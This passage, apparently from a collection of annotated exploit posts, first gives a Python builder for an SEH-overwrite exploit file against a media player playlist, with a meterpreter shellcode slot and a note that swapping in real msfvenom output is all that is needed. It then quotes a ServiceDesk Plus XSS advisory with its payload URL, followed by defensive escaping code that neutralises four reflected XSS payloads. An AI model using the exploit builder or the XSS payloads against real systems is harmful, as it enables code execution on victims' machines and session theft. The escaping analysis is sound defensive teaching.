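The layout in the PoC above is the classic SEH overwrite: 608 bytes of filler to reach the exception registration record, a short jump in nSEH, the handler address in SEH, then the sled and shellcode. The Python below is an added example (not Kevin Randall's code) that builds the same .plf from named parameters and verifies the things that usually go wrong with this technique: the handler address and shellcode must not contain any of the bytes excluded on the msfvenom line, the payload must fit in the region after the record, and the jump must land on the sled. The handler at 0x6164172E is taken from the PoC; that it is a POP/POP/RET is an assumption the PoC does not spell out. DEMO_SHELLCODE is a constructed placeholder of int3 instructions, not real shellcode.

```python
import struct

BAD_CHARS = b"\x00\x0a\x0d\x1a"     # bytes excluded on the msfvenom line of the PoC
NSEH_OFFSET = 608                   # "A" * 608 puts the next four bytes on nSEH
SEH_HANDLER = 0x6164172E            # the PoC's handler address, \x2E\x17\x64\x61 once packed;
                                    # presumably a POP/POP/RET, which the PoC does not state
SHORT_JMP_6 = b"\xeb\x06\x90\x90"   # jmp short +6 (skips the two NOPs and the handler), NOP-padded
REGION_LEN = 1384                   # bytes after the SEH record: NOP sled + shellcode + filler
DEMO_SHELLCODE = b"\xcc" * 32       # constructed placeholder (int3s); paste msfvenom output here


def bad_chars_in(blob, bad=BAD_CHARS):
    """Sorted list of excluded byte values present in blob."""
    return sorted({b for b in blob if b in bad})


def handler_bytes(handler=SEH_HANDLER):
    """Little-endian encoding of the handler address, as it is written into the file."""
    return struct.pack("<I", handler)


def landing_offset():
    """Offset EIP reaches after the short jump: nSEH + 2 (next instruction) + 6 = start of the sled."""
    return NSEH_OFFSET + 2 + 6


def build_plf(shellcode, nops=20, handler=SEH_HANDLER):
    """Assemble the .plf contents: filler, nSEH, SEH, sled, shellcode, filler to REGION_LEN."""
    payload = b"\x90" * nops + shellcode
    if len(payload) > REGION_LEN:
        raise ValueError("payload of %d bytes exceeds the %d-byte region" % (len(payload), REGION_LEN))
    bad = bad_chars_in(payload) + bad_chars_in(handler_bytes(handler))
    if bad:
        raise ValueError("excluded bytes present: %s" % [hex(b) for b in bad])
    return (b"A" * NSEH_OFFSET + SHORT_JMP_6 + handler_bytes(handler)
            + payload + b"D" * (REGION_LEN - len(payload)))


def seh_record(buf):
    """(nSEH, SEH) as they will sit in the overwritten exception registration record."""
    return buf[NSEH_OFFSET:NSEH_OFFSET + 4], buf[NSEH_OFFSET + 4:NSEH_OFFSET + 8]


if __name__ == "__main__":
    with open("payloadofficial.plf", "wb") as f:
        f.write(build_plf(DEMO_SHELLCODE))
```

The 2000-byte file it writes is byte-for-byte the PoC's layout with the placeholder in place of the meterpreter stub; swapping in real msfvenom output is the only change needed, and `build_plf` refuses to write the file if that output carries a bad character the encoder missed.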
25. # Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SolutionSearch.do
# Date: 2019-06-04
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)
# Vendor Homepage: https://www.manageengine.com/products/service-desk
# Version: Zoho ManageEngine ServiceDesk Plus 9.3
# CVE : CVE-2019-12541

Information Description:
An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SolutionSearch.do searchText parameter.

Attack vector:
domain/SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f706z8rz68&selectName=Solutions

PoC:
https://drive.google.com/file/d/1zXyFpVwAPc0MfcERNmvIdyKLzx0JMA9r/view
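The four ServiceDesk Plus advisories (posts 21, 22, 23 and 25) are one bug in three output contexts: qc_siteID and userConfigID close an attribute and open a new tag (`"/><svg ...>`, `"><img ...>`), serviceRequestId is reflected as plain markup, and searchText lands inside a JavaScript string (`1';alert('XSS')//`). The Python below is an added example (not ManageEngine's code) that takes the exact decoded payloads from the attack vectors, renders each into its context with and without context-appropriate encoding, and parses the result the way a browser would to show that the encoded version yields one element whose attribute value is the original string. The `<input name="SELECTSITE">` rendering is a hypothetical reconstruction of how the parameter is reflected; the advisories do not show the page source.

```python
import html
import json
from html.parser import HTMLParser

# The reflected values from the four advisories, URL-decoded, exactly as the server sees them.
PAYLOADS = {
    "SiteLookup.do qc_siteID": "qc_siteID\"/><svg onload=alert('XSS')>",
    "SearchN.do userConfigID": "21111111ucgol\"><img src=a onerror=alert('XSS')>qzmm3u7id8z",
    "PurchaseRequest.do serviceRequestId": "g24aj<img src=a onerror=alert('XSS')>qdaxl",
    "SolutionSearch.do searchText": "1';alert('XSS')//706z8rz68",
}


def attr_value(value):
    """Double-quoted attribute value; html.escape(quote=True) also covers ' and \"."""
    return '"' + html.escape(value, quote=True) + '"'


def text_node(value):
    """Text between tags: escaping <, > and & is what stops the serviceRequestId payload."""
    return html.escape(value, quote=False)


def js_string(value):
    """A JavaScript string literal for a <script> block. JSON escaping neutralises the quote
    the searchText payload breaks out with; <, > and & become \\uXXXX so the literal can
    never contain '</script>'."""
    return (json.dumps(value, ensure_ascii=True)
            .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))


def js_roundtrip(value):
    """The string the JS engine ends up with after js_string(); must equal the input."""
    return json.loads(js_string(value))


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    """(tag, attributes) for every element a browser would create from markup."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def render_input(value, escape):
    """Hidden field reflecting the parameter (hypothetical reconstruction of the page);
    escape=False is the vulnerable form, escape=True the fix."""
    rendered = attr_value(value) if escape else '"' + value + '"'
    return '<input type="hidden" name="SELECTSITE" value=%s>' % rendered


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        raw = [t for t, _ in parse_tags(render_input(payload, escape=False))]
        fixed = [t for t, _ in parse_tags(render_input(payload, escape=True))]
        print("%-38s unescaped -> %s   escaped -> %s" % (name, raw, fixed))
```

The point the parser makes concrete: the fix is chosen by where the value is written, not by what it contains. Attribute encoding does nothing for searchText once it sits inside a script string, and JS escaping does nothing for qc_siteID in an attribute, which is why a single "sanitise on input" pass tends to leave one of these four open.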